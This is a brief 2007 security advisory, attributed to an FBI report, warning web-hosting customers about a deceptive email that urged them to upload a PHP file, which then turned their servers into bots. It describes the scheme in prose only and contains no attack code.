NOW READ THIS
("Security Advisory")

Go Back

---

Submitted by: Bill Hickey
NCVA List Master

NRT-0211 Deceptive Email to Web Hosters in USA:

A deceptive email recently sent to web hosters in the US contained an attached PHP file which, when uploaded, turned the individual computer into a bot, according to an FBI report. A convincing email, claiming to be the parent web-hoster, was mass-mailed to customers of various US web-hosting companies. The message directed the customers to upload an attached PHP file - safeguard.PHP - to their web directory, in order to avoid a serious security issue. Once uploaded, the PHP file downloaded bot-code to the infected computer. At least one individual uploaded the file to their content directory, which made the script in the poisoned PHP file executable. The malicious PHP file then downloaded a very small file of bot-code from a known US IP address. The file also sent an email to "firstbts(@)gmail.com" to announce the creation of a new bot. The server hosting the infected PHP file is believed to be compromised and not knowingly hosting the malicious content.

(FBI source - 16JUN07)

Last Modified: Monday, 25-Jun-2007 09:24:57 EDT